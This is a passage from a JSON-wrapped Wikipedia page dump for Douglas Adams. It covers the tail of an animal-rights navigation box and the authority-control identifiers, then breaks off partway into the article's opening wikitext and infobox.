center;\">Cases</th>\n<td class=\"navbox-list navbox-odd\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px;background:\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><a href=\"/wiki/Brown_Dog_affair\" title=\"Brown Dog affair\">Brown Dog affair</a></li>\n<li><a href=\"/wiki/Cambridge_University_primates\" title=\"Cambridge University primates\">Cambridge University primates</a></li>\n<li><a href=\"/wiki/McDonald%27s_Restaurants_v._Morris_%26_Steel\" 
class=\"mw-redirect\" title=\"McDonald's Restaurants v. Morris & Steel\">McLibel case</a></li>\n<li><a href=\"/wiki/Pit_of_despair\" title=\"Pit of despair\">Pit of despair</a></li>\n<li><a href=\"/wiki/Silver_Spring_monkeys\" title=\"Silver Spring monkeys\">Silver Spring monkeys</a></li>\n<li><a href=\"/wiki/University_of_California_Riverside_1985_laboratory_raid\" class=\"mw-redirect\" title=\"University of California Riverside 1985 laboratory raid\">University of California Riverside 1985 laboratory raid</a></li>\n<li><i><a href=\"/wiki/Unnecessary_Fuss\" title=\"Unnecessary Fuss\">Unnecessary Fuss</a></i></li>\n</ul>\n</div>\n</td>\n</tr>\n</table>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\" style=\"text-align: center;\"><a href=\"/wiki/List_of_animal_rights_advocates\" title=\"List of animal rights advocates\">Advocates</a></th>\n<td class=\"navbox-list navbox-off hlist\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\"></div>\n<table class=\"nowraplinks navbox-subgroup\" style=\"border-spacing:0\">\n<tr>\n<th scope=\"row\" class=\"navbox-group\"><a href=\"/wiki/Category:Animal_rights_advocates\" title=\"Category:Animal rights advocates\">Academics<br />\nand writers</a></th>\n<td class=\"navbox-list navbox-odd\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><a href=\"/wiki/Carol_J._Adams\" title=\"Carol J. Adams\">Carol Adams</a></li>\n<li><a href=\"/wiki/Tom_Beauchamp\" title=\"Tom Beauchamp\">Tom Beauchamp</a></li>\n<li><a href=\"/wiki/Marc_Bekoff\" title=\"Marc Bekoff\">Marc Bekoff</a></li>\n<li><a href=\"/wiki/Paola_Cavalieri\" title=\"Paola Cavalieri\">Paola Cavalieri</a></li>\n<li><a href=\"/wiki/Stephen_R._L._Clark\" title=\"Stephen R. L. Clark\">Stephen R. L. 
Clark</a></li>\n<li><a href=\"/wiki/Alasdair_Cochrane\" title=\"Alasdair Cochrane\">Alasdair Cochrane</a></li>\n<li><a href=\"/wiki/J._M._Coetzee\" title=\"J. M. Coetzee\">J. M. Coetzee</a></li>\n<li><a href=\"/wiki/Priscilla_Cohn\" title=\"Priscilla Cohn\">Priscilla Cohn</a></li>\n<li><a href=\"/wiki/David_DeGrazia\" title=\"David DeGrazia\">David DeGrazia</a></li>\n<li><a href=\"/wiki/Sue_Donaldson\" title=\"Sue Donaldson\">Sue Donaldson</a></li>\n<li><a href=\"/wiki/Josephine_Donovan\" title=\"Josephine Donovan\">Josephine Donovan</a></li>\n<li><a href=\"/wiki/Lawrence_Finsen\" title=\"Lawrence Finsen\">Lawrence Finsen</a></li>\n<li><a href=\"/wiki/Gary_Francione\" class=\"mw-redirect\" title=\"Gary Francione\">Gary Francione</a></li>\n<li><a href=\"/wiki/Robert_Garner\" title=\"Robert Garner\">Robert Garner</a></li>\n<li><a href=\"/wiki/Antoine_Goetschel\" title=\"Antoine Goetschel\">Antoine Goetschel</a></li>\n<li><a href=\"/wiki/John_Hadley_(philosopher)\" title=\"John Hadley (philosopher)\">John Hadley</a></li>\n<li><a href=\"/wiki/Will_Kymlicka\" title=\"Will Kymlicka\">Will Kymlicka</a></li>\n<li><a href=\"/wiki/Andrew_Linzey\" title=\"Andrew Linzey\">Andrew Linzey</a></li>\n<li><a href=\"/wiki/Dan_Lyons\" title=\"Dan Lyons\">Dan Lyons</a></li>\n<li><a href=\"/wiki/Mary_Midgley\" title=\"Mary Midgley\">Mary Midgley</a></li>\n<li><a href=\"/wiki/Martha_Nussbaum\" title=\"Martha Nussbaum\">Martha Nussbaum</a></li>\n<li><a href=\"/wiki/Siobhan_O%27Sullivan\" title=\"Siobhan O'Sullivan\">Siobhan O'Sullivan</a></li>\n<li><a href=\"/wiki/Clare_Palmer\" title=\"Clare Palmer\">Clare Palmer</a></li>\n<li><a href=\"/wiki/Tom_Regan\" title=\"Tom Regan\">Tom Regan</a></li>\n<li><a href=\"/wiki/Bernard_Rollin\" title=\"Bernard Rollin\">Bernard Rollin</a></li>\n<li><a href=\"/wiki/Mark_Rowlands\" title=\"Mark Rowlands\">Mark Rowlands</a></li>\n<li><a href=\"/wiki/Richard_D._Ryder\" title=\"Richard D. Ryder\">Richard D. 
Ryder</a></li>\n<li><a href=\"/wiki/Peter_Singer\" title=\"Peter Singer\">Peter Singer</a></li>\n<li><a href=\"/wiki/Henry_Stephens_Salt\" title=\"Henry Stephens Salt\">Henry Stephens Salt</a></li>\n<li><a href=\"/wiki/Steve_Sapontzis\" title=\"Steve Sapontzis\">Steve Sapontzis</a></li>\n<li><a href=\"/wiki/Gary_Steiner\" title=\"Gary Steiner\">Gary Steiner</a></li>\n<li><a href=\"/wiki/Cass_Sunstein\" title=\"Cass Sunstein\">Cass Sunstein</a></li>\n<li><b><a href=\"/wiki/List_of_animal_rights_advocates\" title=\"List of animal rights advocates\">more...</a></b></li>\n</ul>\n</div>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\"><a href=\"/wiki/Category:Animal_rights_advocates\" title=\"Category:Animal rights advocates\">Activists</a></th>\n<td class=\"navbox-list navbox-even\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><a href=\"/wiki/Cleveland_Amory\" title=\"Cleveland Amory\">Cleveland Amory</a></li>\n<li><a href=\"/wiki/Pamela_Anderson\" title=\"Pamela Anderson\">Pamela Anderson</a></li>\n<li><a href=\"/wiki/Greg_Avery\" title=\"Greg Avery\">Greg Avery</a></li>\n<li><a href=\"/wiki/Alec_Baldwin\" title=\"Alec Baldwin\">Alec Baldwin</a></li>\n<li><a href=\"/wiki/Matt_Ball\" title=\"Matt Ball\">Matt Ball</a></li>\n<li><a href=\"/wiki/Martin_Balluch\" title=\"Martin Balluch\">Martin Balluch</a></li>\n<li><a href=\"/wiki/Barbi_twins\" class=\"mw-redirect\" title=\"Barbi twins\">Barbi twins</a></li>\n<li><a href=\"/wiki/Brigitte_Bardot\" title=\"Brigitte Bardot\">Brigitte Bardot</a></li>\n<li><a href=\"/wiki/Bob_Barker\" title=\"Bob Barker\">Bob Barker</a></li>\n<li><a href=\"/wiki/Gene_Baur\" title=\"Gene Baur\">Gene Baur</a></li>\n<li><a href=\"/wiki/Frances_Power_Cobbe\" title=\"Frances Power Cobbe\">Frances Power Cobbe</a></li>\n<li><a href=\"/wiki/Rod_Coronado\" title=\"Rod Coronado\">Rod 
Coronado</a></li>\n<li><a href=\"/wiki/Evandro_Costa\" title=\"Evandro Costa\">Evandro Costa</a></li>\n<li><a href=\"/wiki/Karen_Davis_(activist)\" title=\"Karen Davis (activist)\">Karen Davis</a></li>\n<li><a href=\"/wiki/Chris_DeRose\" title=\"Chris DeRose\">Chris DeRose</a></li>\n<li><a href=\"/wiki/Robert_Enke\" title=\"Robert Enke\">Robert Enke</a></li>\n<li><a href=\"/wiki/John_Feldmann\" title=\"John Feldmann\">John Feldmann</a></li>\n<li><a href=\"/wiki/Bruce_Friedrich\" title=\"Bruce Friedrich\">Bruce Friedrich</a></li>\n<li><a href=\"/wiki/Juliet_Gellatley\" title=\"Juliet Gellatley\">Juliet Gellatley</a></li>\n<li><a href=\"/wiki/Jordan_Halliday\" title=\"Jordan Halliday\">Jordan Halliday</a></li>\n<li><a href=\"/wiki/Barry_Horne\" title=\"Barry Horne\">Barry Horne</a></li>\n<li><a href=\"/wiki/Ronnie_Lee\" title=\"Ronnie Lee\">Ronnie Lee</a></li>\n<li><a href=\"/wiki/Lizzy_Lind_af_Hageby\" title=\"Lizzy Lind af Hageby\">Lizzy Lind af Hageby</a></li>\n<li><a href=\"/wiki/Jo-Anne_McArthur\" title=\"Jo-Anne McArthur\">Jo-Anne McArthur</a></li>\n<li><a href=\"/wiki/Paul_McCartney\" title=\"Paul McCartney\">Paul McCartney</a></li>\n<li><a href=\"/wiki/Bill_Maher\" title=\"Bill Maher\">Bill Maher</a></li>\n<li><a href=\"/wiki/Keith_Mann\" title=\"Keith Mann\">Keith Mann</a></li>\n<li><a href=\"/wiki/Dan_Mathews\" title=\"Dan Mathews\">Dan Mathews</a></li>\n<li><a href=\"/wiki/Ingrid_Newkirk\" title=\"Ingrid Newkirk\">Ingrid Newkirk</a></li>\n<li><a href=\"/wiki/Heather_Nicholson\" title=\"Heather Nicholson\">Heather Nicholson</a></li>\n<li><a href=\"/wiki/Alex_Pacheco_(activist)\" title=\"Alex Pacheco (activist)\">Alex Pacheco</a></li>\n<li><a href=\"/wiki/Jill_Phipps\" title=\"Jill Phipps\">Jill Phipps</a></li>\n<li><a href=\"/wiki/Joaquin_Phoenix\" title=\"Joaquin Phoenix\">Joaquin Phoenix</a></li>\n<li><a href=\"/wiki/Craig_Rosebraugh\" title=\"Craig Rosebraugh\">Craig Rosebraugh</a></li>\n<li><a href=\"/wiki/Nathan_Runkle\" title=\"Nathan Runkle\">Nathan 
Runkle</a></li>\n<li><a href=\"/wiki/Henry_Spira\" title=\"Henry Spira\">Henry Spira</a></li>\n<li><a href=\"/wiki/Kim_Stallwood\" title=\"Kim Stallwood\">Kim Stallwood</a></li>\n<li><a href=\"/wiki/Marianne_Thieme\" title=\"Marianne Thieme\">Marianne Thieme</a></li>\n<li><a href=\"/wiki/Darren_Thurston\" title=\"Darren Thurston\">Darren Thurston</a></li>\n<li><a href=\"/wiki/Andrew_Tyler\" title=\"Andrew Tyler\">Andrew Tyler</a></li>\n<li><a href=\"/wiki/Gary_Yourofsky\" title=\"Gary Yourofsky\">Gary Yourofsky</a></li>\n<li><b><a href=\"/wiki/List_of_animal_rights_advocates\" title=\"List of animal rights advocates\">more...</a></b></li>\n</ul>\n</div>\n</td>\n</tr>\n</table>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\" style=\"text-align: center;\">Movement</th>\n<td class=\"navbox-list navbox-off hlist\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\"></div>\n<table class=\"nowraplinks navbox-subgroup\" style=\"border-spacing:0\">\n<tr>\n<th scope=\"row\" class=\"navbox-group\"><a href=\"/wiki/Category:Animal_rights_movement\" title=\"Category:Animal rights movement\">Groups</a></th>\n<td class=\"navbox-list navbox-odd\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><a href=\"/wiki/Animal_Aid\" title=\"Animal Aid\">Animal Aid</a></li>\n<li><a href=\"/wiki/Animal_Legal_Defense_Fund\" title=\"Animal Legal Defense Fund\">Animal Legal Defense Fund</a></li>\n<li><a href=\"/wiki/Animal_Liberation_Front\" title=\"Animal Liberation Front\">Animal Liberation Front</a></li>\n<li><a href=\"/wiki/British_Union_for_the_Abolition_of_Vivisection\" class=\"mw-redirect\" title=\"British Union for the Abolition of Vivisection\">British Union for the Abolition of Vivisection</a></li>\n<li><a 
href=\"/wiki/Centre_for_Animals_and_Social_Justice\" title=\"Centre for Animals and Social Justice\">Centre for Animals and Social Justice</a></li>\n<li><a href=\"/wiki/Chinese_Animal_Protection_Network\" title=\"Chinese Animal Protection Network\">Chinese Animal Protection Network</a></li>\n<li><a href=\"/wiki/Direct_Action_Everywhere\" title=\"Direct Action Everywhere\">Direct Action Everywhere</a></li>\n<li><a href=\"/wiki/Farm_Animal_Rights_Movement\" title=\"Farm Animal Rights Movement\">Farm Animal Rights Movement</a></li>\n<li><a href=\"/wiki/Great_Ape_Project\" title=\"Great Ape Project\">Great Ape Project</a></li>\n<li><a href=\"/wiki/Hunt_Saboteurs_Association\" title=\"Hunt Saboteurs Association\">Hunt Saboteurs Association</a></li>\n<li><a href=\"/wiki/In_Defense_of_Animals\" title=\"In Defense of Animals\">In Defense of Animals</a></li>\n<li><a href=\"/wiki/Korea_Animal_Rights_Advocates\" title=\"Korea Animal Rights Advocates\">Korea Animal Rights Advocates</a></li>\n<li><a href=\"/wiki/Last_Chance_for_Animals\" title=\"Last Chance for Animals\">Last Chance for Animals</a></li>\n<li><a href=\"/wiki/Mercy_for_Animals\" title=\"Mercy for Animals\">Mercy for Animals</a></li>\n<li><a href=\"/wiki/New_England_Anti-Vivisection_Society\" title=\"New England Anti-Vivisection Society\">New England Anti-Vivisection Society</a></li>\n<li><a href=\"/wiki/Oxford_Centre_for_Animal_Ethics\" title=\"Oxford Centre for Animal Ethics\">Oxford Centre for Animal Ethics</a></li>\n<li><a href=\"/wiki/Oxford_Group_(animal_rights)\" title=\"Oxford Group (animal rights)\">Oxford Group</a></li>\n<li><a href=\"/wiki/People_for_the_Ethical_Treatment_of_Animals\" title=\"People for the Ethical Treatment of Animals\">People for the Ethical Treatment of Animals</a></li>\n<li><a href=\"/wiki/United_Poultry_Concerns\" title=\"United Poultry Concerns\">United Poultry Concerns</a></li>\n<li><b><a href=\"/wiki/List_of_animal_rights_groups\" title=\"List of animal rights 
groups\">more...</a></b></li>\n</ul>\n</div>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\"><a href=\"/wiki/Category:Animal_advocacy_parties\" title=\"Category:Animal advocacy parties\">Parties</a></th>\n<td class=\"navbox-list navbox-even\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><a href=\"/wiki/Animal_Alliance_Environment_Voters_Party_of_Canada\" title=\"Animal Alliance Environment Voters Party of Canada\">AAEVP</a> (Canada)</li>\n<li><a href=\"/wiki/Animal_Justice_Party\" title=\"Animal Justice Party\">Animal Justice Party</a> (Australia)</li>\n<li><a href=\"/wiki/Animal_Welfare_Party\" title=\"Animal Welfare Party\">Animal Welfare Party</a> (UK)</li>\n<li><i><a href=\"/wiki/Party_Against_Bullfighting,_Cruelty_and_Mistreatment_of_Animals\" class=\"mw-redirect\" title=\"Party Against Bullfighting, Cruelty and Mistreatment of Animals\">PACMA</a></i> (Spain)</li>\n<li><i><a href=\"/wiki/Party_for_the_Animals\" title=\"Party for the Animals\">Partij voor de Dieren</a></i> (Netherlands)</li>\n<li><i><a href=\"/wiki/Italian_Animal_Welfare_Party\" title=\"Italian Animal Welfare Party\">Partito Animalista Italiano</a></i> (Italy)</li>\n<li><i><a href=\"/wiki/Tierschutzpartei\" class=\"mw-redirect\" title=\"Tierschutzpartei\">Tierschutzpartei</a></i> (Germany)</li>\n<li><b><a href=\"/wiki/List_of_animal_advocacy_parties\" title=\"List of animal advocacy parties\">more...</a></b></li>\n</ul>\n</div>\n</td>\n</tr>\n</table>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\" style=\"text-align: center;\">Media</th>\n<td class=\"navbox-list navbox-off hlist\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\"></div>\n<table class=\"nowraplinks 
navbox-subgroup\" style=\"border-spacing:0\">\n<tr>\n<th scope=\"row\" class=\"navbox-group\"><a href=\"/wiki/Category:Books_about_animal_rights\" title=\"Category:Books about animal rights\">Books</a></th>\n<td class=\"navbox-list navbox-odd\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><i><a href=\"/wiki/Animals%27_Rights:_Considered_in_Relation_to_Social_Progress\" title=\"Animals' Rights: Considered in Relation to Social Progress\">Animals' Rights: Considered in Relation to Social Progress</a></i> (1894)</li>\n<li><i><a href=\"/wiki/Animals,_Men_and_Morals\" title=\"Animals, Men and Morals\">Animals, Men and Morals</a></i> (1971)</li>\n<li><i><a href=\"/wiki/Animal_Liberation_(book)\" title=\"Animal Liberation (book)\">Animal Liberation</a></i> (1975)</li>\n<li><i><a href=\"/wiki/The_Case_for_Animal_Rights\" title=\"The Case for Animal Rights\">The Case for Animal Rights</a></i> (1983)</li>\n<li><i><a href=\"/wiki/The_Lives_of_Animals\" title=\"The Lives of Animals\">The Lives of Animals</a></i> (1999)</li>\n<li><i><a href=\"/wiki/Striking_at_the_Roots\" title=\"Striking at the Roots\">Striking at the Roots</a></i> (2008)</li>\n<li><i><a href=\"/wiki/An_American_Trilogy_(book)\" title=\"An American Trilogy (book)\">An American Trilogy</a></i> (2009)</li>\n<li><b><a href=\"/wiki/Category:Books_about_animal_rights\" title=\"Category:Books about animal rights\">more...</a></b></li>\n</ul>\n</div>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\"><a href=\"/wiki/Category:Documentary_films_about_animal_rights\" title=\"Category:Documentary films about animal rights\">Films</a></th>\n<td class=\"navbox-list navbox-even\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><i><a href=\"/wiki/The_Animals_Film\" 
title=\"The Animals Film\">The Animals Film</a></i> (1981)</li>\n<li><i><a href=\"/wiki/A_Cow_at_My_Table\" title=\"A Cow at My Table\">A Cow at My Table</a></i> (1998)</li>\n<li><i><a href=\"/wiki/Meet_Your_Meat\" title=\"Meet Your Meat\">Meet Your Meat</a></i> (2002)</li>\n<li><i><a href=\"/wiki/Peaceable_Kingdom_(documentary)\" class=\"mw-redirect\" title=\"Peaceable Kingdom (documentary)\">Peaceable Kingdom</a></i> (2004)</li>\n<li><i><a href=\"/wiki/Earthlings_(film)\" title=\"Earthlings (film)\">Earthlings</a></i> (2005)</li>\n<li><i><a href=\"/wiki/Behind_the_Mask_(2006_documentary_film)\" class=\"mw-redirect\" title=\"Behind the Mask (2006 documentary film)\">Behind the Mask</a></i> (2006)</li>\n<li><i><a href=\"/wiki/The_Cove_(film)\" title=\"The Cove (film)\">The Cove</a></i> (2009)</li>\n<li><i><a href=\"/wiki/Forks_Over_Knives\" title=\"Forks Over Knives\">Forks Over Knives</a></i> (2011)</li>\n<li><i><a href=\"/wiki/Vegucated\" title=\"Vegucated\">Vegucated</a></i> (2011)</li>\n<li><i><a href=\"/wiki/Speciesism:_The_Movie\" title=\"Speciesism: The Movie\">Speciesism: The Movie</a></i> (2013)</li>\n<li><i><a href=\"/wiki/The_Ghosts_in_Our_Machine\" title=\"The Ghosts in Our Machine\">The Ghosts in Our Machine</a></i> (2013)</li>\n<li><b><a href=\"/wiki/Category:Documentary_films_about_animal_rights\" title=\"Category:Documentary films about animal rights\">more...</a></b></li>\n</ul>\n</div>\n</td>\n</tr>\n</table>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<th scope=\"row\" class=\"navbox-group\" style=\"text-align: center;\">Categories</th>\n<td class=\"navbox-list navbox-off hlist\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><a href=\"/wiki/Category:Animal_advocacy_parties\" title=\"Category:Animal advocacy parties\">Animal advocacy parties</a></li>\n<li><a href=\"/wiki/Category:Animal_law\" title=\"Category:Animal 
law\">Animal law</a></li>\n<li><a href=\"/wiki/Category:Animal_Liberation_Front\" title=\"Category:Animal Liberation Front\">Animal Liberation Front</a></li>\n<li><a href=\"/wiki/Category:Animal_rights\" title=\"Category:Animal rights\">Animal rights</a></li>\n<li><a href=\"/wiki/Category:Animal_rights_advocates\" title=\"Category:Animal rights advocates\">Animal rights advocates</a></li>\n<li><a href=\"/wiki/Category:Animal_rights_media\" title=\"Category:Animal rights media\">Animal rights media</a></li>\n<li><a href=\"/wiki/Category:Animal_rights_movement\" title=\"Category:Animal rights movement\">Animal rights movement</a></li>\n<li><a href=\"/wiki/Category:Animal_testing\" title=\"Category:Animal testing\">Animal testing</a></li>\n<li><a href=\"/wiki/Category:Blood_sports\" title=\"Category:Blood sports\">Blood sports</a></li>\n<li><a href=\"/wiki/Category:Livestock\" title=\"Category:Livestock\">Livestock</a></li>\n<li><a href=\"/wiki/Category:Meat_industry\" title=\"Category:Meat industry\">Meat industry</a></li>\n<li><a href=\"/wiki/Category:Poultry_farming\" title=\"Category:Poultry farming\">Poultry farming</a></li>\n<li><a href=\"/wiki/Category:Veganism\" title=\"Category:Veganism\">Veganism</a></li>\n<li><a href=\"/wiki/Category:Vegetarianism\" title=\"Category:Vegetarianism\">Vegetarianism</a></li>\n</ul>\n</div>\n</td>\n</tr>\n<tr style=\"height:2px\">\n<td colspan=\"2\"></td>\n</tr>\n<tr>\n<td class=\"navbox-abovebelow\" colspan=\"2\" style=\"text-align: center;\">\n<div><span class=\"metadata\"><a href=\"/wiki/File:Paw_(Animal_Rights_symbol).svg\" class=\"image\"><img alt=\"icon\" src=\"//upload.wikimedia.org/wikipedia/commons/thumb/7/71/Paw_%28Animal_Rights_symbol%29.svg/16px-Paw_%28Animal_Rights_symbol%29.svg.png\" width=\"16\" height=\"16\" srcset=\"//upload.wikimedia.org/wikipedia/commons/thumb/7/71/Paw_%28Animal_Rights_symbol%29.svg/24px-Paw_%28Animal_Rights_symbol%29.svg.png 1.5x, 
//upload.wikimedia.org/wikipedia/commons/thumb/7/71/Paw_%28Animal_Rights_symbol%29.svg/32px-Paw_%28Animal_Rights_symbol%29.svg.png 2x\" data-file-width=\"500\" data-file-height=\"500\" /></a> <a href=\"/wiki/Portal:Animal_rights\" title=\"Portal:Animal rights\">Animal rights portal</a></span></div>\n</td>\n</tr>\n</table>\n</div>\n<div role=\"navigation\" class=\"navbox\" aria-label=\"Navbox\" style=\"padding:3px\">\n<table class=\"nowraplinks hlist navbox-inner\" style=\"border-spacing:0;background:transparent;color:inherit\">\n<tr>\n<th scope=\"row\" class=\"navbox-group\"><a href=\"/wiki/Help:Authority_control\" title=\"Help:Authority control\">Authority control</a></th>\n<td class=\"navbox-list navbox-odd\" style=\"text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px\">\n<div style=\"padding:0em 0.25em\">\n<ul>\n<li><span style=\"white-space:nowrap;\"><a rel=\"nofollow\" class=\"external text\" href=\"//www.worldcat.org/identities/containsVIAFID/113230702\">WorldCat Identities</a></span></li>\n<li><span style=\"white-space:nowrap;\"><a href=\"/wiki/Virtual_International_Authority_File\" title=\"Virtual International Authority File\">VIAF</a>: <span class=\"uid\"><a rel=\"nofollow\" class=\"external text\" href=\"https://viaf.org/viaf/113230702\">113230702</a></span></span></li>\n<li><span style=\"white-space:nowrap;\"><a href=\"/wiki/Library_of_Congress_Control_Number\" title=\"Library of Congress Control Number\">LCCN</a>: <span class=\"uid\"><a rel=\"nofollow\" class=\"external text\" href=\"http://id.loc.gov/authorities/names/n80076765\">n80076765</a></span></span></li>\n<li><span style=\"white-space:nowrap;\"><a href=\"/wiki/International_Standard_Name_Identifier\" title=\"International Standard Name Identifier\">ISNI</a>: <span class=\"uid\"><a rel=\"nofollow\" class=\"external text\" href=\"http://isni.org/isni/0000000080456315\">0000 0000 8045 6315</a></span></span></li>\n<li><span style=\"white-space:nowrap;\"><a 
href=\"/wiki/Integrated_Authority_File\" title=\"Integrated Authority File\">GND</a>: <span class=\"uid\"><a rel=\"nofollow\" class=\"external text\" href=\"http://d-nb.info/gnd/119033364\">119033364</a></span></span></li>\n<li><span style=\"white-space:nowrap;\"><a href=\"/wiki/LIBRIS\" title=\"LIBRIS\">SELIBR</a>: <span class=\"uid\"><a rel=\"nofollow\" class=\"external text\" href=\"//libris.kb.se/auth/230807\">230807</a></span></span></li>\n<li><span style=\"white-space:nowrap;\"><a href=\"/wiki/Syst%C3%A8me_universitaire_de_documentation\" title=\"Système universitaire de documentation\">SUDOC</a>: <span class=\"uid\"><a rel=\"nofollow\" class=\"external text\" href=\"http://www.idref.fr/026677636\">026677636</a></span></span></li>\n<li><span style=\"white-space:nowrap;\"><a href=\"/wiki/Biblioth%C3%A8que_nationale_de_France\" title=\"Bibliothèque nationale de France\">BNF</a>: <span class=\"uid\"><a rel=\"nofollow\" class=\"external text\" href=\"http://catalogue.bnf.fr/ark:/12148/cb11888092r\">cb11888092r</a> <a rel=\"nofollow\" class=\"external text\" href=\"http://data.bnf.fr/ark:/12148/cb11888092r\">(data)</a></span></span></li>\n<li><span style=\"white-space:nowrap;\"><a href=\"/wiki/BIBSYS\" class=\"mw-redirect\" title=\"BIBSYS\">BIBSYS</a>: <span class=\"uid\"><a rel=\"nofollow\" class=\"external text\" href=\"http://ask.bibsys.no/ask/action/result?cmd=&kilde=biblio&cql=bs.autid+%3D+90196888&feltselect=bs.autid\">90196888</a></span></span></li>\n<li><span style=\"white-space:nowrap;\"><a href=\"/wiki/MusicBrainz\" title=\"MusicBrainz\">MusicBrainz</a>: <span class=\"uid\"><a rel=\"nofollow\" class=\"external text\" href=\"//musicbrainz.org/artist/e9ed318d-8cc5-4cf8-ab77-505e39ab6ea4\">e9ed318d-8cc5-4cf8-ab77-505e39ab6ea4</a></span></span></li>\n<li><span style=\"white-space:nowrap;\"><a href=\"/wiki/National_Library_of_Australia\" title=\"National Library of Australia\">NLA</a>: <span class=\"uid\"><a rel=\"nofollow\" class=\"external text\" 
href=\"//nla.gov.au/anbd.aut-an35163268\">35163268</a></span></span></li>\n<li><span style=\"white-space:nowrap;\"><a href=\"/wiki/National_Diet_Library\" title=\"National Diet Library\">NDL</a>: <span class=\"uid\"><a rel=\"nofollow\" class=\"external text\" href=\"http://id.ndl.go.jp/auth/ndlna/00430962\">00430962</a></span></span></li>\n<li><span style=\"white-space:nowrap;\"><a href=\"/wiki/National_Library_of_the_Czech_Republic\" title=\"National Library of the Czech Republic\">NKC</a>: <span class=\"uid\"><a rel=\"nofollow\" class=\"external text\" href=\"http://aleph.nkp.cz/F/?func=find-c&local_base=aut&ccl_term=ica=jn19990000029&CON_LNG=ENG\">jn19990000029</a></span></span></li>\n<li><span style=\"white-space:nowrap;\"><a href=\"/wiki/Istituto_Centrale_per_il_Catalogo_Unico\" title=\"Istituto Centrale per il Catalogo Unico\">ICCU</a>: <span class=\"uid\"><a rel=\"nofollow\" class=\"external text\" href=\"http://opac.sbn.it/opacsbn/opac/iccu/scheda_authority.jsp?bid=IT\\ICCU\\RAVV\\034417\">IT\\ICCU\\RAVV\\034417</a></span></span></li>\n<li><span style=\"white-space:nowrap;\"><a href=\"/wiki/Russian_State_Library\" title=\"Russian State Library\">RLS</a>: <span class=\"uid\"><a rel=\"nofollow\" class=\"external text\" href=\"http://aleph.rsl.ru/F?func=find-b&find_code=SYS&adjacent=Y&local_base=RSL11&request=000002833&CON_LNG=ENG\">000002833</a></span></span></li>\n<li><span style=\"white-space:nowrap;\"><a href=\"/wiki/Biblioteca_Nacional_de_Espa%C3%B1a\" title=\"Biblioteca Nacional de España\">BNE</a>: <span class=\"uid\"><a rel=\"nofollow\" class=\"external text\" href=\"http://catalogo.bne.es/uhtbin/authoritybrowse.cgi?action=display&authority_id=XX1149955\">XX1149955</a></span></span></li>\n<li><span style=\"white-space:nowrap;\"><a href=\"/wiki/CiNii\" title=\"CiNii\">CiNii</a>: <span class=\"uid\"><a rel=\"nofollow\" class=\"external text\" 
href=\"http://ci.nii.ac.jp/author/DA07517784?l=en\">DA07517784</a></span></span></li>\n</ul>\n</div>\n</td>\n</tr>\n</table>\n</div>\n\n",
"displaytitle": "Douglas Adams",
"iwlinks": [
{
"prefix": "commons",
"url": "https://commons.wikimedia.org/wiki/Category:Douglas_Adams",
"title": "commons:Category:Douglas Adams"
},
{
"prefix": "wikiquote",
"url": "https://en.wikiquote.org/wiki/Special:Search/Douglas_Adams",
"title": "wikiquote:Special:Search/Douglas Adams"
}
],
"wikitext": "{{other people}}\n{{Use British English|date=October 2013}}\n{{Use dmy dates|date=April 2015}}\n{{Infobox writer <!-- for more information see [[:Template:Infobox writer/doc]] -->\n| name = Douglas Adams\n| image = Douglas adams portrait cropped.jpg\n| caption =\n| birth_name = Douglas Noel Adams\n| birth_date = {{birth date|1952|3|11|df=yes}}\n| birth_place = [[Cambridge]], England\n| height = {{height|ft=6|in=5}}\n| death_date = {{Death date and age|2001|5|11|1952|3|11|df=yes}}\n| death_place = [[Montecito, California]], U.S.\n| resting_place = [[Highgate Cemetery]], London, England\n| alma_mater = [[St John's College, Cambridge]]\n| occupation = Writer\n| genre = Science fiction, comedy, satire\n| movement =\n| website = {{URL|douglasadams.com/}}\n}}\n<!-- Do *not* change spelling of \"Hitchhiker's\"; see talk page for details -->\n<!-- Please do *not* change spelling of \"Noel\". There is no 'ë'. Any citations have themselves been taken from an earlier, incorrect edit of Wikipedia; see talk page for details -->\n'''Douglas Noel Adams''' (11 March 1952 – 11 May 2001) was an [[English people|English]] [[author]], [[scriptwriter]], [[essayist]], [[List of humorists|humourist]], [[satirist]] and [[dramatist]].\n\nAdams is best known as the author of 